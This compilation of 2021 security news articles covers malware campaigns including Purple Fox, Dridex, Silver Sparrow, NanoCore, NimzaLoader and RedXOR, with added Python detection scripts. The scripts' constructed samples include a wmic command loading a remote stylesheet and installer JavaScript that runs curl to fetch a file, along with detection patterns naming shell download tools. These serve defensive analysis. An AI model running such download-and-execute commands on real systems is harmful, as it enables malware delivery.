“While it appears that the functionality of Purple Fox hasn’t changed much post exploitation, its spreading and distribution methods – and its worm-like behavior – are much different than described in previously published articles. Throughout our research, we have observed an infrastructure that appears to be made out of a hodge-podge of vulnerable and exploited servers hosting the initial payload of the malware, infected machines which are serving as nodes of those constantly worming campaigns, and server infrastructure that appears to be related to other malware campaigns.”

Serper’s team at Guardicore warned that the attackers are hosting various MSI packages on nearly 2,000 servers, most of which are compromised machines which were repurposed to host malicious payloads.

“We have established that the vast majority of the servers, which are serving the initial payload, are running on relatively old versions of Windows Server running IIS version 7.5 and Microsoft FTP, which are known to have multiple vulnerabilities with varying severity levels,” Guardicore said in a technical blog post.

The company found the campaign spreading via two distinct mechanisms -- a worm payload after a victim machine is compromised through a vulnerable exposed service (such as SMB); or the worm payload is being sent via email through a phishing campaign.

The company is encouraging malware hunters to use public indicators of compromise to find signs of malicious activity related to this threat.


Purple Fox Rootkit Can Now Spread Itself to Other Windows Computers
24.3.2021
Virus  Thehackernews

Purple Fox, a Windows malware previously known for infecting machines by using exploit kits and phishing emails, has now added a new technique to its arsenal that gives it worm-like propagation capabilities.

The ongoing campaign makes use of a "novel spreading technique via indiscriminate port scanning and exploitation of exposed SMB services with weak passwords and hashes," according to Guardicore researchers, who say the attacks have spiked by about 600% since May 2020.

A total of 90,000 incidents have been spotted through the rest of 2020 and the beginning of 2021.

First discovered in March 2018, Purple Fox is distributed in the form of malicious ".msi" payloads hosted on nearly 2,000 compromised Windows servers that, in turn, download and execute a component with rootkit capabilities, which enables the threat actors to hide the malware on the machine and make it easy to evade detection.

Guardicore says Purple Fox hasn't changed much post-exploitation, but where it has is in its worm-like behavior, allowing the malware to spread more rapidly.

It achieves this by breaking into a victim machine through a vulnerable, exposed service such as server message block (SMB), leveraging the initial foothold to establish persistence, pull the payload from a network of Windows servers, and stealthily install the rootkit on the host.

Once infected, the malware blocks multiple ports (445, 139, and 135), likely in an attempt to "prevent the infected machine from being reinfected, and/or to be exploited by a different threat actor," notes Amit Serper, Guardicore's new vice president of security research for North America.

In the next phase, Purple Fox commences its propagation process by generating IP ranges and scanning them on port 445, using the probes to single out vulnerable devices on the Internet with weak passwords and brute-forcing them to ensnare the machines into a botnet.

While botnets are often deployed by threat actors to launch denial-of-service attacks against websites with the goal of taking them offline, they can also be used to spread all kinds of malware, including file-encrypting ransomware, on the infected computers, although in this case, it's not immediately clear what the attackers are looking to achieve.

If anything, the new infection vector is another sign of criminal operators constantly retooling their malware distribution mechanism to cast a wide net and compromise as many machines as possible. Details about the indicators of compromise (IoCs) associated with the campaign can be accessed here.


$4,000 COVID-19 ‘Relief Checks’ Cloak Dridex Malware
18.3.2021
Virus  Threatpost

The American Rescue Act is the latest zeitgeisty lure being circulated in an email campaign.

Cybercriminals have wasted no time in hopping on the American Rescue Plan – the COVID-19 relief legislation just signed into law – as a lure for email-based scams.

According to researchers at Cofense, a campaign began circulating in March that capitalized on Americans’ interest in the forthcoming $1,400 relief payments and other aid. The emails impersonate the IRS, using the agency’s official logo and a spoofed sender domain of IRS[.]gov – and claim to offer an application for financial assistance. In reality, the emails offer the Dridex banking trojan.

The email says, “It is possible to get aid from the federal government of your choice” and then offers “quotes” for a pie-in-the-sky litany of great (and nonexistent) things – such as a $4,000 check, the ability to “skip the queue for vaccination” and free food.

There’s a button that says, “Get apply form” – if clicked, users are taken to a Dropbox account where they see an Excel document that says, “Fill this form below to accept Federal State Aid.” However, to see this supposed IRS form in its entirety, victims are prompted to enable content. If they do, they trigger macros that set off the infection chain indirectly, according to Cofense.

The email lure. Source: Cofense.

“While static analysis easily identifies the URLs used to download malware in this case, automated behavioral analysis may have trouble recognizing the activity as malicious because it does not use macros to directly download malware or run a PowerShell script,” Cofense researchers explained, in a posting on Tuesday. “The macros used by the .XLSM files drop an .XSL file to disk, and then use a Windows Management Instrumentation (WMI) query to gather system information.”

WMI (Windows Management Instrumentation) is a Windows management subsystem, reachable from PowerShell and from the wmic.exe command-line tool, that gives admins access to system monitoring data – including the ability to ask for information about anything that exists on a given computer, such as which files and applications are present. The caller can also request that the responses to these queries be rendered in a certain format; for wmic.exe that format is an XSL stylesheet, and a stylesheet can carry script that the formatter executes.

“The WMI query employed in this case…demands that the dropped .XSL file be used to format the response to the query,” researchers wrote. “This formatting directive allows JavaScript contained in the .XSL file to be executed via WMI and download malware, avoiding the more commonly seen methods via PowerShell.”
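The wmic /FORMAT trick above is cheap to hunt for in process-creation telemetry. The script below is an added example, not code from Cofense or this article: it runs a detection rule over constructed process-creation events (the paths, command lines and the list of built-in wmic formatters are assumptions, not telemetry from this campaign) and flags wmic.exe invocations whose /FORMAT: argument is a path, a URL or an unknown stylesheet name, plus any wmic.exe launched by an Office application.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events (parent image, child image, command line).
# These are illustrative only, not telemetry from the Cofense investigation.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic os get /FORMAT:"C:\Users\victim\AppData\Local\Temp\stage.xsl"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"wmic process list brief /format:csv"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"wmic os get name /format:https://example.invalid/payload.xsl"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe report.txt"},
]

# Formatters that ship with Windows live in %WINDIR%\System32\wbem as <name>.xsl and are
# referenced by bare name. This set is assumed and non-exhaustive; anything given as a
# path, a URL or an unknown name is treated as a custom stylesheet.
BUILTIN_FORMATS = {"list", "csv", "htable", "hform", "table", "mof", "rawxml", "xml",
                   "texttable", "textvaluelist", "value"}

FORMAT_RE = re.compile(r'/format:\s*"?([^"\s]+)"?', re.IGNORECASE)
OFFICE_RE = re.compile(r"\\(winword|excel|powerpnt|outlook)\.exe$", re.IGNORECASE)


@dataclass
class Finding:
    reason: str
    cmdline: str


def inspect_event(ev):
    """Return a list of Findings for one process-creation event."""
    findings = []
    if not ev["image"].lower().endswith("\\wmic.exe"):
        return findings
    m = FORMAT_RE.search(ev["cmdline"])
    if m:
        fmt = m.group(1)
        # Strip any directory or URL prefix to get the formatter name.
        name = fmt.replace("\\", "/").rsplit("/", 1)[-1].lower()
        is_path = "/" in fmt or "\\" in fmt
        if is_path or name not in BUILTIN_FORMATS:
            findings.append(Finding("wmic /FORMAT with custom stylesheet (script execution)", ev["cmdline"]))
    if OFFICE_RE.search(ev["parent"]):
        findings.append(Finding("wmic spawned by an Office application", ev["cmdline"]))
    return findings


def scan(events):
    """Run inspect_event over every event and collect the findings."""
    hits = []
    for ev in events:
        hits.extend(inspect_event(ev))
    return hits


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.reason}: {f.cmdline}")
```

The first event models the chain in the article (an Excel macro dropping an .XSL and calling wmic) and yields two findings; the /format:csv call from Explorer is left alone. In Sysmon terms the equivalent fields are Event ID 1 ParentImage, Image and CommandLine. Because the built-in formatter list is not exhaustive, baseline it against your own environment before alerting on every unknown name.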

What is the Dridex Banking Trojan?
Since its first appearance in 2011, the Dridex malware (a.k.a. Bugat and Cridex) has been deployed via phishing emails and generally targets banking information. After capturing banking credentials, it endeavors to make unauthorized electronic funds transfers from unknowing victims’ bank accounts.

By 2015, the malware was one of the most prevalent financial trojans in the wild, particularly when it came to targeting corporate employees; while later versions of the malware were designed with the added function of assisting in the installation of ransomware. It has also enhanced its obfuscation capabilities over time.

In December 2019, authorities cracked down on Russian-speaking cybercrime group Evil Corp. with sanctions and charges against its leader, Maksim Yakubets, known for his lavish lifestyle. U.S. authorities are still offering up to $5 million for information leading to his arrest; they allege that Yakubets and Evil Corp. have stolen millions of dollars from victims using the Dridex banking trojan and Zeus malware.

How to Prevent the Phish
This latest campaign is convincing, researchers said – to a certain extent. One sneaky trick the attackers use is that the email domain is lRS[.]gov – but with a lower-case ‘L’ rather than an upper-case ‘I.’

However, phrasing like “Federal State Aid” (federal and state aid are two different things) and off grammar such as “the federal government of your choice” should set off warning bells.

“A close examination of the email shows a few suspicious characteristics,” according to Cofense. “The phrasing within the document, while not clearly as bad as something auto-translated from another language, still has some mistakes that are unexpected from what purports to be a government communication.”

They added, “Despite those issues, this campaign is likely to entice the average user who’s in a hurry to learn more about the rescue plan.”

To avoid becoming a victim, users should hone their phishing-recognition skills, such as scanning for slight differences between legitimate and spoofed domains. And for businesses, “as a general rule, WMI and PowerShell should be carefully monitored on most workstations,” Cofense recommended.


Good old malware for the new Apple Silicon platform
13.3.2021
Virus  Securelist
A short while ago, Apple released Mac computers with the new chip called Apple M1. The unexpected release was a milestone in the Apple hardware industry. However, as technology evolves, we also observe a growing interest in the newly released platform from malware adversaries. This inevitably leads us to new malware samples compiled for the Apple Silicon platform. In this article, we are going to take a look at threats for Macs with the Apple M1 chip on board. Also, we prepared a short F.A.Q. section at the end of the article for those who want to understand better the security risks of M1 malware. Let’s dive in.

XCSSET malware
Last year, a threat called XCSSET was discovered for the first time. It targets mainly Mac developers using a unique way of distribution: injecting a malicious payload into Xcode IDE projects on the victim’s Mac. This payload will be executed at the time of building project files in Xcode. XCSSET modules have numerous capabilities, such as:

Reading and dumping Safari cookies,
Injecting malicious JavaScript code into various websites,
Stealing user files and information from applications, such as Notes, WeChat, Skype, Telegram, etc.,
Encrypting user files.
All these various features, in combination with high stealth and an unusual way of distribution, make XCSSET a dangerous threat for Mac computers.

While exploring the various executable modules of XCSSET, we found out that some of them also contained samples compiled specially for new Apple Silicon chips. For example, a sample with the MD5 hash sum 914e49921c19fffd7443deee6ee161a4 contains two architectures: x86_64 and ARM64.

The first one corresponds to previous-generation, Intel-based Mac computers, but the second one is compiled for ARM64 architecture, which means that it can run on computers with the new Apple M1 chip. According to VirusTotal, this sample was first uploaded on 2021-02-24 21:06:05 and the original research report did not contain this hash or a module named “metald”, the name of the executable file. With this information on hand, we can assume that the XCSSET campaign is probably still ongoing. This leads us to the thought that more and more malware writers are actively recompiling their samples to have an opportunity to run on new Apple Silicon Macs natively.

Silver Sparrow threat
XCSSET is not the only family which has adapted to run natively on Apple Silicon. According to a RedCanary report, a new threat called Silver Sparrow has been identified. This threat introduces a new way for malware writers to abuse the default packaging functionality: instead of placing a malicious payload in preinstall or postinstall scripts, malware writers hid one in the Distribution XML file.

This payload uses the Installer JavaScript API to run bash commands in order to download a JSON configuration file.

Downloading of JSON config

And after successfully downloading that configuration file, the sample extracts a URL from the downloadURL field for the next download.

Downloading and executing a payload

Also, an appropriate Launch Agent is created for persistent execution of the malicious sample.

Malware persistence

This JavaScript payload can be executed regardless of chip architecture, but in the package file with the MD5 hash sum fdd6fb2b1dfe07b0e57d4cbfef9c8149, there is a “fat” Mach-O containing two supported architectures (ARM64 and x86_64), as compared to the old package with the MD5 hash sum 30c9bc7d40454e501c358f77449071aa. This means that the malware actors are trying to expand their attack coverage by supporting a wider range of platforms.
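As an added illustration, not code from the Red Canary report or this article, the script below triages the Distribution file of a macOS installer package for the pattern just described: JavaScript hooks that run before installation and call the Installer API's system.run(). The Distribution XML is constructed for the example; its function name, URL and paths are placeholders rather than indicators from Silver Sparrow.

```python
import re
import xml.etree.ElementTree as ET

# Constructed Distribution file modelled on the pattern described above; the
# function name, URL and paths are placeholders, not indicators from the real package.
SAMPLE_DISTRIBUTION = """<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="1">
  <title>Updater</title>
  <options customize="never" allow-external-scripts="no"/>
  <installation-check script="pm_install_check();"/>
  <script>
function pm_install_check() {
  system.run('/bin/sh', '-c', 'curl -s https://example.invalid/version.json -o /tmp/version.json');
  return true;
}
  </script>
  <choices-outline><line choice="default"/></choices-outline>
  <choice id="default" title="Updater"><pkg-ref id="com.example.updater"/></choice>
  <pkg-ref id="com.example.updater" version="1.0">#updater.pkg</pkg-ref>
</installer-gui-script>
"""

# Installer JavaScript calls that hand control to the system, plus strings that
# usually mean a downloader or persistence is being set up from inside the installer UI.
SYSTEM_CALL_RE = re.compile(r"\bsystem\.run(?:Once)?\s*\(")
SHELL_HINT_RE = re.compile(r"(/bin/(?:ba|z)?sh|\bcurl\b|\bwget\b|\bosascript\b|\blaunchctl\b|LaunchAgents)")
HOOK_TAGS = ("installation-check", "volume-check")


def analyze_distribution(xml_text):
    """Return a list of human-readable findings for one Distribution file."""
    root = ET.fromstring(xml_text)
    findings = []
    # Hooks run before the user even clicks Install, so script here executes on open.
    for tag in HOOK_TAGS:
        for el in root.iter(tag):
            if el.get("script"):
                findings.append(f"<{tag}> runs JavaScript: {el.get('script').strip()}")
    for el in root.iter("script"):
        body = el.text or ""
        for m in SYSTEM_CALL_RE.finditer(body):
            line = body[:m.start()].count("\n") + 1
            findings.append(f"system.run() call in <script> at line {line}")
        hints = sorted(set(SHELL_HINT_RE.findall(body)))
        if hints:
            findings.append("shell/download indicators in <script>: " + ", ".join(hints))
    return findings


if __name__ == "__main__":
    for f in analyze_distribution(SAMPLE_DISTRIBUTION):
        print(f)
```

Extract the file with pkgutil --expand package.pkg outdir and point analyze_distribution at outdir/Distribution. The sample yields three findings: the installation-check hook, the system.run() call on line 3 of the script, and the /bin/sh and curl strings.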

Adware threats for the new platform
However, malware is not the only category of unwanted software that can be launched on Apple Silicon. The well-known Mac malware researcher Patrick Wardle recently published a post covering the Pirrit adware. Though it is an old and well-known adware family, it is still actively updated by its authors, and new samples are encountered in the wild quite often.

These updates include:

Anti-debug techniques such as calling the ptrace syscall with the PT_DENY_ATTACH request,
Control flow obfuscation techniques,
Dynamic imports resolved with dlsym calls to hinder static analysis,
Virtual machine detection.

Control flow obfuscation; dynamic symbols resolving with dlsym

Besides these improvements in regular Intel x86_64 samples, new ARM64 samples were introduced. These are crafted specifically for the Apple Silicon M1 chip, but the consequences of running these are roughly the same: launching Pirrit adware results in pop-ups, banners and various annoying advertisements displayed on the victim’s Mac.

Pirrit is not the only adware family to have begun supporting the Apple Silicon platform recently. For example, we also observed an ARM64 Bnodlero adware sample (MD5 82e02c1ca8dfb4c60ee98dc877ce77c5), which runs a bash downloader script using the system() function.

Bash downloader executed by Bnodlero sample

Frequently Asked Questions
What is so special about M1 threats?

Well, there is not much special about them, frankly speaking. The only thing that distinguishes the new Apple M1 threats from previous ones targeting Intel-based Mac computers is the architecture of the Mac processor for which the executable is compiled. In order to get their applications to run on Apple Silicon, software developers should recompile their code into executables which can run on the M1 chip. The same is true for malware adversaries.

Is Apple M1 chip less secure than Intel ones?

No, it is just a matter of platform support in malware executables.

Are Intel-based Macs affected by M1 threats?

Yes and no. On the one hand, code that is compiled exclusively for the Apple Silicon platform cannot be natively executed on the Intel x86_64 architecture. On the other hand, malicious samples are often delivered in so-called “fat” Mach-O, which usually contains the same code but is compiled for several architectures. This means that running this “fat” executable will result in launching the right malicious code depending on your platform architecture. Pirrit and Bnodlero samples are great examples of this approach.
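To see what "fat" means in practice, here is an added example, not from Securelist or the samples above, that reads the fat header and lists the architectures a Mach-O file carries. The binary it inspects is constructed in the script itself (two empty slices laid out the way ld and lipo produce them); none of the hashes mentioned above is reproduced.

```python
import struct

FAT_MAGIC = 0xCAFEBABE        # big-endian on disk; also the Java class-file magic, so verify the slices
MH_MAGIC_64 = 0xFEEDFACF      # 64-bit Mach-O header, little-endian on disk
MH_MAGIC = 0xFEEDFACE         # 32-bit Mach-O header
CPU_TYPE_X86_64 = 0x01000007
CPU_TYPE_ARM64 = 0x0100000C
CPU_NAMES = {CPU_TYPE_X86_64: "x86_64", CPU_TYPE_ARM64: "arm64"}

FAT_ARCH = struct.Struct(">iiIII")   # cputype, cpusubtype, offset, size, align (log2)
SLICE_ALIGN = 12                     # 4096-byte slice alignment, as ld/lipo produce


def build_fat_sample():
    """Construct a minimal two-slice universal binary. Not a real sample: each slice is a
    bare mach_header_64 with no load commands, padded to the slice alignment."""
    slices = [(CPU_TYPE_X86_64, 3), (CPU_TYPE_ARM64, 0)]   # subtypes: X86_64_ALL, ARM64_ALL
    page = 1 << SLICE_ALIGN
    header = struct.pack(">II", FAT_MAGIC, len(slices))
    entries, blobs = b"", b""
    offset = page
    for cputype, subtype in slices:
        # mach_header_64: magic, cputype, cpusubtype, filetype (MH_EXECUTE=2), ncmds,
        # sizeofcmds, flags, reserved
        mh = struct.pack("<IiiIIIII", MH_MAGIC_64, cputype, subtype, 2, 0, 0, 0, 0)
        entries += FAT_ARCH.pack(cputype, subtype, offset, len(mh), SLICE_ALIGN)
        blobs += mh.ljust(page, b"\0")
        offset += page
    return (header + entries).ljust(page, b"\0") + blobs


def list_architectures(data):
    """Return the CPU architectures contained in a thin or fat Mach-O image."""
    if len(data) < 8:
        raise ValueError("too short to be a Mach-O image")
    if struct.unpack(">I", data[:4])[0] == FAT_MAGIC:
        nfat = struct.unpack(">I", data[4:8])[0]
        archs = []
        for i in range(nfat):
            cputype, _, offset, size, _ = FAT_ARCH.unpack_from(data, 8 + i * FAT_ARCH.size)
            if offset + size > len(data) or size < 4:
                raise ValueError(f"slice {i} lies outside the file (truncated or not Mach-O)")
            slice_magic = struct.unpack("<I", data[offset:offset + 4])[0]
            if slice_magic not in (MH_MAGIC_64, MH_MAGIC):
                raise ValueError(f"slice {i} does not start with a Mach-O header")
            archs.append(CPU_NAMES.get(cputype, hex(cputype)))
        return archs
    thin_magic = struct.unpack("<I", data[:4])[0]
    if thin_magic in (MH_MAGIC_64, MH_MAGIC):
        cputype = struct.unpack("<i", data[4:8])[0]
        return [CPU_NAMES.get(cputype, hex(cputype))]
    raise ValueError("not a Mach-O image")


if __name__ == "__main__":
    sample = build_fat_sample()
    print("fat:", list_architectures(sample))
    print("thin slice:", list_architectures(sample[4096:4096 + 32]))
```

On macOS, lipo -archs and file report the same information; the parser is useful where those tools are absent, for instance in a Linux triage pipeline. Because FAT_MAGIC is also the Java class-file magic, each slice is checked for a Mach-O header before the file is accepted as universal. The newer 64-bit fat header (0xCAFEBABF) is not handled here.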

Can threats for Intel-based Macs run on Apple M1?

Yes, they can. Due to the Rosetta 2 feature, newly released Mac computers with Apple M1 can also run malicious code written exclusively for Intel x86_64 architecture. This backward compatibility will certainly be abused by malware operators until Apple completes the transition to their proprietary chips.

Is there an upward trend in M1 malware?

Yes, there certainly is, and it is absolutely to be expected. As soon as a platform becomes more popular or highly anticipated, developers try to ensure that their software is available for it. Malware developers are no exception.

Conclusion
With the new M1 chip, Apple has certainly pushed its performance and energy saving limits on Mac computers, but malware developers kept an eye on those innovations and quickly adapted their executables to Apple Silicon by porting the code to the ARM64 architecture.

We have observed various attempts to port executables not just among typical adware such as Pirrit or Bnodlero samples, but also among malicious packages, such as the Silver Sparrow threat and XCSSET downloadable malicious modules. This certainly will give a kickstart to other malware adversaries to begin adapting their code for running on Apple M1 chips.


Malspam campaign uses icon files to deliver NanoCore RAT
13.3.2021
Virus  Securityaffairs

Researchers at Trustwave spotted a new malspam campaign that is abusing icon files to trick victims into installing the NanoCore Trojan.
Researchers at Trustwave have spotted a new malspam campaign that is abusing icon files to trick victims into executing the NanoCore remote access Trojan.

The emails use a .zipx file attachment; .zipx is the extension WinZip gives to ZIP archives compressed with its newer compression methods.

The messages claim to be from a “Purchase Manager” at organizations the attackers are spoofing, and they carry an attachment named “NEW PURCHASE ORDER.pdf*.zipx” which is actually an image (icon) binary file.

“The attachments, which have a filename format “NEW PURCHASE ORDER.pdf*.zipx”, are actually image (Icon) binary files, with attached extra data, which happens to be RAR. This file format abuse is similar to what we have seen previously.” reads the analysis published by Trustwave.

malspam icon files
The binary files have attached extra data in a .RAR format.

The attackers use an icon file to get past scanning email gateways.

A prerequisite for the success of this campaign is that the victim has an archive tool installed that can extract the executable inside the attachment. Upon opening the attachment, an executable file is extracted.

“Interestingly, 7Zip can also extract the content of the latest .zipx sample. 7Zip initially tries to open the files as a ZIP archive and fails, but afterward, 7Zip recognizes the .zipx files as Rar5 archives and can get their contents unpacked. Unlike in the previous blog, there is no need for the extension of the recent attachments to be renamed to something else other than .zipx or .zip just for their executables to be extracted using 7Zip.” states the report. “The executables we gathered have a similar name to that of the .zipx attachment, “NEW PURCHASE ORDER*.exe”. Also, the icon at the start of the .zipx files is actually the icon used on the EXE files within the archive.”

The analysis of the EXE files employed in the campaign revealed that the threat actors attempted to install NanoCore RAT version 1.2.2.0 on the victims’ systems. NanoCore RAT is a “general purpose” malware with client builders that are available to everyone and easily accessible. The RAT implements information stealer and keylogger capabilities, and it also allows the delivery of additional payloads to the victim’s system.

The NanoCore RAT creates copies of itself in the AppData folder and injects its malicious code into the RegSvcs.exe process.

“The recent malspams have the same goal like the ones we investigated almost two years ago and that is to effectively hide the malicious executable from anti-malware and email scanners by abusing the file format of the “.zipx” attachment, which in this case is an Icon file with added surprises.” concludes the report.

Experts also published Indicators of Compromise (IoCs) for the threat.


Researchers Spotted Malware Written in Nim Programming Language
13.3.2021
Virus  Thehackernews

Cybersecurity researchers have unwrapped an "interesting email campaign" undertaken by a threat actor that has taken to distributing a new malware written in Nim programming language.

Dubbed "NimzaLoader" by Proofpoint researchers, the development marks one of the rare instances of Nim malware discovered in the threat landscape.

"Malware developers may choose to use a rare programming language to avoid detection, as reverse engineers may not be familiar with Nim's implementation, or focused on developing detection for it, and therefore tools and sandboxes may struggle to analyze samples of it," the researchers said.

Proofpoint is tracking the operators of the campaign under the moniker "TA800," who, they say, started distributing NimzaLoader starting February 3, 2021. Prior to the latest raft of activity, TA800 is known to have predominantly used BazaLoader since April 2020.

Nim Programming Language
While APT28 has been previously linked to delivering Zebrocy malware using Nim-based loaders, the appearance of NimzaLoader is yet another sign that malicious actors are constantly retooling their malware arsenal to avoid detection.

Proofpoint's findings have also been independently corroborated by researchers from Walmart's threat intelligence team, who named the malware "Nimar Loader."

Like with the case of BazaLoader, the campaign spotted on February 3 made use of personalized email phishing lures containing a link to a supposed PDF document that redirected the recipient to a NimzaLoader executable hosted on Slack, which used a fake Adobe icon as part of its social engineering tricks.

Once opened, the malware is designed to provide the attackers with access to the victim's Windows systems, alongside capabilities to execute arbitrary commands retrieved from a command-and-control server — including executing PowerShell commands, injecting shellcode into running processes, and even deploying additional malware.

Additional evidence gathered by Proofpoint and Walmart show that NimzaLoader is also being used to download and execute Cobalt Strike as its secondary payload, suggesting that threat actors integrate different tactics into their campaigns.

"It is [...] unclear if Nimzaloader is just a blip on the radar for TA800 — and the wider threat landscape — or if Nimzaloader will be adopted by other threat actors in the same way BazaLaoder has gained wide adoption," the researchers concluded.


Linux Systems Under Attack By New RedXOR Malware

12.3.2021 Virus  Threatpost

Researchers say the new RedXOR backdoor is targeting Linux systems with various data exfiltration and network traffic tunneling capabilities.

Researchers have discovered a new backdoor targeting Linux systems, which they link back to the Winnti threat group.

The backdoor is called RedXOR – in part because its network data-encoding scheme is based on the XOR operation, and in part because its samples were found on an old release of the Red Hat Enterprise Linux platform. The latter fact provides a clue that RedXOR is utilized in targeted attacks against legacy Linux systems, noted researchers.

The malware has various malicious capabilities, said researchers – from exfiltrating data to tunneling network traffic to another destination.

“The initial compromise in this campaign is not known but some common entry points to Linux environments are: Use of compromised credentials or by exploiting a vulnerability or misconfiguration,” Avigayil Mechtinger, security researcher with Intezer, told Threatpost. “It is also possible the initial compromise was via a different endpoint, meaning the threat actor laterally moved to a Linux machine where this malware was deployed.”

The samples were detected after being uploaded to VirusTotal from two different sources in Indonesia and Taiwan. Researchers told Threatpost that based on this, it is likely that at least two entities have discovered the malware in their environment.

RedXOR Malware: Cybersecurity Threat
After execution, RedXOR creates a hidden folder (called “.po1kitd.thumb”) inside a home folder, which is then utilized to store files related to the malware. Then, it creates a hidden file (“.po1kitd-2a4D53”) inside this folder. The malware then installs a binary to the hidden folder (called “.po1kitd-update-k”), and sets up persistence via “init” scripts.

“The malware stores the configuration encrypted within the binary,” said researchers, in a Wednesday analysis. “In addition to the command-and-control (C2) IP address and port, it can also be configured to use a proxy. The configuration includes a password… This password is used by the malware to authenticate to the C2 server.”

After establishing this configuration, the malware then communicates with the C2 server over a TCP socket, and can execute various different commands (via a command code). These commands include: uploading, removing or opening files, executing shell commands, tunneling network traffic and writing content to files.

Chinese Threat Actor Connection
Researchers said they found “key similarities” between RedXOR and other previously reported malware that is associated with Winnti: the PWNLNX backdoor, the XOR.DDOS botnet and the Groundhog botnet. The Winnti threat group (a.k.a. APT41, Barium, Wicked Panda or Wicked Spider) is known for nation-state-backed cyber-espionage activity as well as financial cybercrime.

These similarities include the use of open-source kernel rootkits (used for hiding their processes); the function name CheckLKM being used; network encoding with XOR; and various similarities in the main functions flow.

Also, “the overall code flow, behavior and capabilities of RedXOR are very similar to PWNLNX,” said researchers. “Both have file uploading and downloading functionalities together with a running shell. The network-tunneling functionality in both families is called ‘PortMap.'”

Malware Authors Eye Linux Systems
Researchers said that 2020 saw a 40-percent increase in new Linux malware families – a new record at 56 malware strains. Beyond Winnti, threat actors like APT28, APT29 and Carbanak are developing Linux versions of their traditional malware, they said.

“Linux systems are under constant attack given that Linux runs on most of the public cloud workload,” said Intezer researchers. “A survey conducted by Sophos found that 70 percent of organizations using the public cloud to host data or workloads experienced a security incident in the past year.”


NanoCore RAT Scurries Past Email Defenses with .ZIPX Tactic
12.3.2021
Virus  Threatpost

A spam campaign hides a malicious executable behind file archive extensions.

A spate of malicious emails with attachments delivering the NanoCore remote access trojan (RAT) is evading anti-malware and email scanners by abusing the .ZIPX file format.

That’s according to researchers at Trustwave, who found that the campaign is effectively hiding a malicious executable by giving it a .ZIPX file extension, which is used to denote a .ZIP archive compressed using the WinZip archiver. In reality, the attached file is an Icon image file with a .RAR archive appended to it. .RAR is a proprietary archive file format that supports data compression, error recovery and file spanning.

“The emails, claiming to be from the purchase manager of certain organizations that the cybercriminals are spoofing, look like usual [malicious spam emails] except for their attachment,” according to a Trustwave blog, published on Thursday. “The attachments, which have a filename format ‘NEW PURCHASE ORDER.pdf*.zipx,’ are actually image (Icon) binary files, with attached extra data, which happens to be .RAR.”

The victim’s machine needs to have an unzip tool that can extract the executable file inside the attachment. Enclosing the executable in a .RAR archive instead of a .ZIP file makes this more likely; it means that the file can be extracted by the popular archiving tool 7Zip, as well as WinRAR, Trustwave noted. 7Zip recognizes the .ZIPX files as Rar5 archives and can thus unpack their contents.

WinZip however does not support unzipping of the file.

“The NanoCore malware could be installed onto the system, if the user decides to run and extract it,” the researchers explained. “It all works because various archive utilities try their darndest to find something to unzip within files. You might even argue they try too hard.”
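The file-format abuse described in the two Trustwave write-ups on this page (the Securityaffairs summary above and this article) can be checked by content rather than by extension. The following is an added example, not Trustwave's code: it builds a constructed icon file with a RAR5 signature appended and then parses the ICONDIR to find where the icon data ends, reporting any archive signature found at or beyond that point.

```python
import struct

# ICONDIR is 6 bytes (reserved, type, count); each ICONDIRENTRY is 16 bytes.
ICONDIR = struct.Struct("<HHH")
ICONDIRENTRY = struct.Struct("<BBBBHHII")   # width, height, colors, reserved, planes, bpp, size, offset
ARCHIVE_SIGS = (
    ("RAR5", b"Rar!\x1a\x07\x01\x00"),
    ("RAR4", b"Rar!\x1a\x07\x00"),
    ("ZIP", b"PK\x03\x04"),
)


def build_sample():
    """Construct an icon file with a RAR5 header glued on. Not a real sample: the image
    data is a zero-filled placeholder and the archive is just its signature plus filler."""
    image = b"\x28\x00\x00\x00" + b"\x00" * 60          # 64 bytes, BITMAPINFOHEADER-like
    header = ICONDIR.pack(0, 1, 1)                       # reserved=0, type=1 (icon), one image
    entry = ICONDIRENTRY.pack(16, 16, 0, 0, 1, 32, len(image), ICONDIR.size + ICONDIRENTRY.size)
    archive = ARCHIVE_SIGS[0][1] + b"\x00" * 48 + b"NEW PURCHASE ORDER.exe"
    return header + entry + image + archive


def inspect_attachment(data):
    """Classify a blob the way a gateway should: is it an icon, where does the icon
    end, and does an archive signature appear at or after that point?"""
    result = {"is_icon": False, "icon_end": None, "archive": None,
              "archive_offset": None, "appended_archive": False}
    if len(data) >= ICONDIR.size:
        reserved, ftype, count = ICONDIR.unpack_from(data, 0)
        dir_end = ICONDIR.size + count * ICONDIRENTRY.size
        if reserved == 0 and ftype in (1, 2) and count > 0 and len(data) >= dir_end:
            end = dir_end
            for i in range(count):
                *_, size, offset = ICONDIRENTRY.unpack_from(data, ICONDIR.size + i * ICONDIRENTRY.size)
                end = max(end, offset + size)
            result["is_icon"] = True
            result["icon_end"] = end
    for name, sig in ARCHIVE_SIGS:
        pos = data.find(sig)
        if pos != -1:
            result["archive"] = name
            result["archive_offset"] = pos
            break
    if result["is_icon"] and result["archive"] is not None and result["archive_offset"] >= result["icon_end"]:
        result["appended_archive"] = True
    return result


if __name__ == "__main__":
    print(inspect_attachment(build_sample()))
```

For the sample, the icon directory and image occupy the first 86 bytes and the RAR5 signature sits exactly at byte 86, so the verdict is an icon with an appended archive. A gateway that trusts the .zipx extension, or a magic-based type check that reads only the leading bytes, sees an icon and stops; the archive tools in the campaign do the opposite and keep scanning until they find something to unpack, which is why a scanner has to do the same.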

The malware more specifically is NanoCore version 1.2.2.0. When executed, it creates copies of itself in the AppData folder and injects its malicious code into the RegSvcs.exe process, according to the analysis. From there, it sets about stealing data from the victim’s machine, including clipboard data, keystrokes, documents and files. NanoCore is also a modular trojan that can be modified to include additional plugins, expanding its functionality and performance based on the user’s needs.

Previous campaigns, including one in 2019 that delivered the Lokibot malware, have made use of the .ZIPX tactic, researchers said.

